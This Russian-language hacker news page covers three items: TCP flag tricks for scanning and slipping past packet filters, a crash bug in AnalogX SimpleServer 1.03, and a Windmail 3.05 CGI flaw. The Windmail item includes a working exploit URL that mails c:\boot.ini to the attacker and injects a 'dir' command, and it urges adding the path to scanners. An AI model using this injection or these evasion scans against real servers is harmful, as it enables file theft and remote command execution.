Главная
Архив новостей
Безопасность в Unix
Безопасность в Windows
Сборник FAQ'ов
Телефония, фрикинг
Кредитные карты
Криптография
Истории о хакерах
Программы, утилиты
_el@sp.sz.ru

RB2 Network






ИГРЫ В ПАКЕТЫ

Всё больший и больший интерес международных аналитиков безопасности вызывают манимуляции пакетами, в частности, именно исследования такого рода привели к открытию метода инициации TCP-соединения с любым портом, закрытым файрволов, такие исследования позволили понять причины внезапных срывов SMTP-сессий, о чём мы говорили в предыдущей новости, и сейчас была сделана попытка произвести суммарную оценку "неадекватной" реакции операционных систем на особые последовательности пакетов.

Итак, для поверки "живых" хостов достаточно отправить предполагаемому получателю пакет с установленным ACK-флагом и с любыми другими, кроме RST. Вне зависимости от состояния порта, на который адресован пакет, хост ответит пакетом RST.

Сочетание SYN+FIN+URG вызовет ответ RST|ACK вне зависимости от того, открыт ли порт или нет.

Сочетание SYN, SYN+FIN, SYN+PUSH, SYN+URG, SYN+FIN+PUSH, SYN+URG+PUSH, FIN+URG+PUSH+SYN приведёт к тому, что мы получим ответ RST|ACK, если тестируемый порт закрыт, и SYN|ACK, если порт открыт.

Индентификация типа ОС: флаги FIN, FIN+URG+PUSH, URG, URG+PUSH, URG+FIN, PUSH, PUSH+FIN и NULL приведут к получению RST|ACK, если порт закрыт, UNIX-системы не ответят на тест, если порт открыт, а системы Windows по-прежнему будут отвечать RST|ACK.

Если мы применили вышеупомянутые способы обнаружения хостов и не получили ответа, то на нашем пути стоит пакетный фильтр и предохраняет расположенные за ним машины от нашего тестирования. Пакетные фильтры - очень тупые устройства: в случае, если данный пакетный фильтр просто блокирует входящие SYN-пакеты к определённому диапазонну портов, то комбинации, не содержащие флага SYN, по-прежнему успешно минуют его. Если фильтр отностится к классу фильтров состояний, то в принципе он успешно выполнит свою работу и все наши ухищрения пройдут даром.

Автор надеется, что его описание успешно поясняет принципы функционирования большинства современных сканеров портов и методов обнаружения зафайрволеных сервисов. Документ был подготовлен менеджером компании Packet Technologies Ofir'ом Arkin'ом.
ОЧЕРЕДНОЙ НЕПОПУЛЯРНЫЙ HTTPD ПОДВЕРЖЕН ПЕРЕПОЛНЕНИЮ БУФФЕРА

Сервер AnalogX SimpleServer 1.03 может быть выведен из строя весьма странной DoS-атакой. При запросе методом GET пути, состоящего из 17 символов (при этом более длинный или более короткий запрос будет обработан нормально) произойдёт сбой в программе, связанный с ошибкой в модуле emu-str.c.
ПРОГРАММА РАССЫЛКИ ПОЧТЫ ПОЗВОЛЯЕТ ИСПОЛНЯТЬ КОМАНДЫ НА СЕРВЕРЕ

Приложение для win32 Windmail 3.05, предназначенное для почтовых рассылок, может быть использовано и как CGI-приложение, выполняющее те же функции. Однако данная программа не проверяет ни пути к аттачментам, ни спецсимволы в параметрах, что привело к возможности читать файлы и исполнять команды на сервере с привилегиями пользователя, от которого запускается web-сервер.

Чтобы использовать данную уязвимость в своих целях, не требуется большого опыта или временных затрат : запрос http://victim.dom/cgi-bin/WINDMAIL.EXE?%20 -n%20c:\boot.ini%20yourmail@mail.com%20|%20dir%20c:\ поочерёдно отошлёт на вашу почту файл c:\boot.ini и затем выполнит команду dir c:\. Итак, можете добавлять в списки скриптов ваших CGI-сканеров очередную строку - /cgi-bin/windmail.exe - это стандартное расположение данного уязвимого приложения на web-сервере.
 duke.

Team Void


<== Back to main page